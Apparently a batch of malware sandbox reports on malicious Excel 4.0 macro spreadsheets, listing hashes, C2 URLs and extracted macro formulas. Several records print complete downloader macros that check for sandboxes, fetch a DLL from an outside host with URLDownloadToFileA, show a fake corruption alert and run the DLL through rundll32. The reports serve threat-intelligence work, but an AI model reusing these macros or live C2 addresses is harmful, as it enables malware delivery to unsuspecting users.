{"version":"0.2","sample":{"sample":"","kind":"file","target":"07f222b70d0582b3072f532175984050d5283a7877617e730a3fc2dea9a967ac"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"07f222b70d0582b3072f532175984050d5283a7877617e730a3fc2dea9a967ac","filesize":112128,"md5":"f75af63c8c7593b61d1c5492ab9a3ba2","sha1":"d020b3ecd3e85890bf5c276c4e8bbc1468dd1f8b","sha256":"07f222b70d0582b3072f532175984050d5283a7877617e730a3fc2dea9a967ac","sha512":"03e94e1c0fc04b9d0fc584caae7649d51e3d29f77ec06f856846f18d3284c55c4be1b24be14b6c870ac08ad57673d0e9b2b265c6b115128ad4eccf315f6566e8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"07f222b70d0582b3072f532175984050d5283a7877617e730a3fc2dea9a967ac.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0801dba4eb9e365bed019e75b8906e24d7190e41f433f61defd1ecbbb1f2a5da"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"0801dba4eb9e365bed019e75b8906e24d7190e41f433f61defd1ecbbb1f2a5da","filesize":206336,"md5":"0eca67847ea61c64ceb52c53e79d579b","sha1":"154ff5f7b8aff3132532cb2470b0fe7ce85ec888","sha256":"0801dba4eb9e365bed019e75b8906e24d7190e41f433f61defd1ecbbb1f2a5da","sha512":"375081557782b2058ceb64b079f7ab92e204aafb74b8f7ef265e195a47fa99b85349170b8c79378027d56fe095a192d1cf4250634d5e7574780cf8c18c37550f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0801dba4eb9e365bed019e75b8906e24d7190e41f433f61defd1ecbbb1f2a5da.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WYRFIPGX8L\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"081383de230a3310a44e909de7a669fc402bef704ff83c08772c2ede205b7aea"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"081383de230a3310a44e909de7a669fc402bef704ff83c08772c2ede205b7aea","filesize":185344,"md5":"9794c34183fd9045debe8fd66bc25ad9","sha1":"4f34622142590d8c828d276901b5c91dedd4a87d","sha256":"081383de230a3310a44e909de7a669fc402bef704ff83c08772c2ede205b7aea","sha512":"d804361f94b38452e5e5b13e7e93e543d8f62cece771fc8ab04d4d6e800b01be599a63ae21738d50e8179d119ae5b251acda6ccda07d1cece87f2f2326a39487","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"081383de230a3310a44e909de7a669fc402bef704ff83c08772c2ede205b7aea.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0820306d068aa22ace02007a723dba546ac48d62dfcf02734baae9161d345d43"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"0820306d068aa22ace02007a723dba546ac48d62dfcf02734baae9161d345d43","filesize":112128,"md5":"e0ea4a39c1918d809db1aacb1f46b00a","sha1":"bfee8f6ae7c0319a93ad77502ccd571bb59b647d","sha256":"0820306d068aa22ace02007a723dba546ac48d62dfcf02734baae9161d345d43","sha512":"33f5c81fc4006622dba557abfa5e3c4bb2b28fd6d72bbb5406f0be9d704650b2da24a8ad717ee5f79fae6b60b1d2e44dea14e5de46212c9038f184f265e99bd3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0820306d068aa22ace02007a723dba546ac48d62dfcf02734baae9161d345d43.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0828b2b525751c6c572c1df7df78f91d0f6b6449328de50ce92ffcc33daf3277"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"0828b2b525751c6c572c1df7df78f91d0f6b6449328de50ce92ffcc33daf3277","filesize":225280,"md5":"cbdd930c521845e0e777947981e0401c","sha1":"86fa28f25b1ac757693f1b779990435eb1d30f8b","sha256":"0828b2b525751c6c572c1df7df78f91d0f6b6449328de50ce92ffcc33daf3277","sha512":"1b5f677eeb32d9a923a75e45f2418df064142fd2cc75442d7b529319ddfa0ad08bcd60e2229273d5123aa0e82d1761e0d3a3e2075750a729669886c8758b281d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0828b2b525751c6c572c1df7df78f91d0f6b6449328de50ce92ffcc33daf3277.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XzxXuMVYDT\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"084076c7734dd89484eae0fcabf54fb7534ebcbdb6f00fe92ff52a7e2cca85fb"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"084076c7734dd89484eae0fcabf54fb7534ebcbdb6f00fe92ff52a7e2cca85fb","filesize":167936,"md5":"3f10b5df55e81a8b3c7ecf0cb47b4675","sha1":"563cc63bf44afbe1a2d2b575c5d8aac16f0662ab","sha256":"084076c7734dd89484eae0fcabf54fb7534ebcbdb6f00fe92ff52a7e2cca85fb","sha512":"ca6e52cd933d6a5593b21b6106792eab89cc154ee360689cf165aa123eb209ae79620fb8abcf041036172ade417af8d1bbc42e58d49b4c907e962a9c26a8f704","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"084076c7734dd89484eae0fcabf54fb7534ebcbdb6f00fe92ff52a7e2cca85fb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XJub4MxSUI\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0842232290111d3e3838e6dcdc222d64d1c07da4dc12786cbdd51878a0b1a211"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"0842232290111d3e3838e6dcdc222d64d1c07da4dc12786cbdd51878a0b1a211","filesize":113664,"md5":"feb817b71aefa6474909a74cd26fb76c","sha1":"11fae4d69521f6eb7aa83856cf2fd568791fc59c","sha256":"0842232290111d3e3838e6dcdc222d64d1c07da4dc12786cbdd51878a0b1a211","sha512":"fc1ad8b1ded4fb27c8542f7b5be17ea23ddc7bed5fd61de71c86e22546bf021723a991e5e8e727c9065f84100ab204ceceaf813409b30d1d88c386e3f7cba8da","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0842232290111d3e3838e6dcdc222d64d1c07da4dc12786cbdd51878a0b1a211.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0zWhE3Hxak\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"084750c2e94fc7e43e9909a71ef88b73a15b96aa5a44a800342141d82b85514e"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"084750c2e94fc7e43e9909a71ef88b73a15b96aa5a44a800342141d82b85514e","filesize":113664,"md5":"ebfea7c36ef5cacd7a951e213eb9cf03","sha1":"8433fa68c5eafb402ec29a1fd3968ef5d4b37f2c","sha256":"084750c2e94fc7e43e9909a71ef88b73a15b96aa5a44a800342141d82b85514e","sha512":"520b72f75d2bf19f2dfdbf7e54be4747f5d435be901845541d979a6b08861612d6114d7f212b756672f447ff8c5a7ce0e161c6d52fd8916f935340b4c44afa4d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"084750c2e94fc7e43e9909a71ef88b73a15b96aa5a44a800342141d82b85514e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hMAVI9sv9N\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"084f290b2919b699a3303f093e7e4f8d947dfebdce4abc071f4b5e343f43acb0"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"084f290b2919b699a3303f093e7e4f8d947dfebdce4abc071f4b5e343f43acb0","filesize":170496,"md5":"57c4897d9ed7caff77dbabeeeaf00d61","sha1":"6bf9dcbdd7c7cb58f2fd41d4e7caf1bc088b6083","sha256":"084f290b2919b699a3303f093e7e4f8d947dfebdce4abc071f4b5e343f43acb0","sha512":"c7c1f494d5b348f8a55f1d898c2b76feceb7b7ff4fabcf706dff0897f5c5394085c72e3b060468b623baeed5d94be17e3d1d2d72977d9f961958357487bb350a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"084f290b2919b699a3303f093e7e4f8d947dfebdce4abc071f4b5e343f43acb0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KWy1OXWIzW\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0851641f6fc28a68b1cbdc902ad8ba602de6da32e08295de938a02e288818044"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"0851641f6fc28a68b1cbdc902ad8ba602de6da32e08295de938a02e288818044","filesize":126464,"md5":"6e1da8ad875b7234fb0fe5b60b32da99","sha1":"0db6bcfb59e88eeee516b78e0331712acdc2c204","sha256":"0851641f6fc28a68b1cbdc902ad8ba602de6da32e08295de938a02e288818044","sha512":"18b4f371a2cd4f557dec33c712cee49c8a2e9cfc87eab4c491cb4790fdd22fb8d35805b5ba1f74c220ebb83e5d1ecc450cf28077ea4d1bd741081244a4db07f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0851641f6fc28a68b1cbdc902ad8ba602de6da32e08295de938a02e288818044.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://march262020.club/files/bot.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\\hQPDpQm\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://march262020.club/files/bot.dl\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll,DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0857f9a323f4b8b6d976efd9411e499a74fbcd75475c070d58974a3bd09b3439"},"analysis":{"reported":"2020-04-09T16:14:45Z","score":10},"files":[{"filename":"0857f9a323f4b8b6d976efd9411e499a74fbcd75475c070d58974a3bd09b3439","filesize":225280,"md5":"c900491231fc31b50007dee599e6f8c0","sha1":"7be1072336cb27964b1c6365855a494e89dbfd43","sha256":"0857f9a323f4b8b6d976efd9411e499a74fbcd75475c070d58974a3bd09b3439","sha512":"77f09745e534e0731128c419696eaab624ed6d82f3c060bb9e0fd9c7382aa2a485dc3feba196c255e80bdee6efe5875924a6a66774f3f65f3a001b0d0120af47","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0857f9a323f4b8b6d976efd9411e499a74fbcd75475c070d58974a3bd09b3439.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2hTcLLUjyp\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0858d8e281767b2a2701237bba501e589172165caca664c77b7e64aa28fe48a0"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"0858d8e281767b2a2701237bba501e589172165caca664c77b7e64aa28fe48a0","filesize":185344,"md5":"15bd0b6a0b97c22b82b3bf5094a81d6f","sha1":"244116d3ac49c85582caf87bd318d0f60c36bdc3","sha256":"0858d8e281767b2a2701237bba501e589172165caca664c77b7e64aa28fe48a0","sha512":"f492c4e495ae3d1ad7e7d347fa5de215cf2cec9a8f83af26ee00d0476d8e169ea72136d5bf4b0d10e9c21545ac78c5cb38f3a4b3bb862a67ff333ac67e81fe1b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0858d8e281767b2a2701237bba501e589172165caca664c77b7e64aa28fe48a0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0880766a91a66c51d78e284b0a7c5a0e3ffd83b386bfa0c87916c2a6cc6dc04c"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"0880766a91a66c51d78e284b0a7c5a0e3ffd83b386bfa0c87916c2a6cc6dc04c","filesize":104448,"md5":"2526c9282f96cf07980b14a94769841b","sha1":"3d49315f7d553acfa3fd7283889804095c44bf2a","sha256":"0880766a91a66c51d78e284b0a7c5a0e3ffd83b386bfa0c87916c2a6cc6dc04c","sha512":"851d4eb5cb09cb887c2086cc3a61506ffc3c995cee01bfb0bdacf2925049935462ce910f72d90bcafcdc420aac79ae4a166e90bd849168e03c39e2371108eb8a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0880766a91a66c51d78e284b0a7c5a0e3ffd83b386bfa0c87916c2a6cc6dc04c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"jmhIyGLKPy\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"089ce3fbba9e7bc141c89709b5762612d8f01f20d81f7dd3210fc869604225e2"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"089ce3fbba9e7bc141c89709b5762612d8f01f20d81f7dd3210fc869604225e2","filesize":168448,"md5":"34091be745c9e4f34896f968ebb610f9","sha1":"7bafb39c5c56833264f11f4f6dabb088c62a019d","sha256":"089ce3fbba9e7bc141c89709b5762612d8f01f20d81f7dd3210fc869604225e2","sha512":"feb0bd413259f74c7f39a0d65d1f86f4dfdfc48f35f7e0ca9b7cab5920cf293f8dde97c275679a8055fafb75fcbe58371331efd535bab09d22f59e4683517caa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"089ce3fbba9e7bc141c89709b5762612d8f01f20d81f7dd3210fc869604225e2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"U3xU3hEcPE\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"08a0f9ac7f399c9e8de70daa4627270cf692cf104e0a738a9f198e120f11e27e"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"08a0f9ac7f399c9e8de70daa4627270cf692cf104e0a738a9f198e120f11e27e","filesize":168960,"md5":"70bc0220cce18941076f10008cb0f6be","sha1":"1820de71f12a1b6ffe82ee09aee2f48cf393b9f0","sha256":"08a0f9ac7f399c9e8de70daa4627270cf692cf104e0a738a9f198e120f11e27e","sha512":"b74d1692b3818333d4e0bfc8703539afb2072ce07609e0ef6f71e00f1794d8527d86bb49c2c7362f7802e6f04065ff76bcb2ca7bf1c17ef6f8d14077c4e56c81","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"08a0f9ac7f399c9e8de70daa4627270cf692cf104e0a738a9f198e120f11e27e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ltJfAAgbvj\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"08a9645007683d22931e0d1762801bf91a4091fee8172d27b971235b585aa59f"},"analysis":{"reported":"2020-04-09T16:14:46Z","score":10},"files":[{"filename":"08a9645007683d22931e0d1762801bf91a4091fee8172d27b971235b585aa59f","filesize":112128,"md5":"bb4052858e9dca4a5ee94674650552a7","sha1":"03391685949a20765f6b104e1c14acc6ec864fbe","sha256":"08a9645007683d22931e0d1762801bf91a4091fee8172d27b971235b585aa59f","sha512":"b9d47221b9c334416cfee59ce5b036168dae775976d0a5fb36164a4c877fcd67224fd216c8abb89fe409456d999dd6f3ecacfa3beb40c27b48ff40ab245b8216","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"08a9645007683d22931e0d1762801bf91a4091fee8172d27b971235b585aa59f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
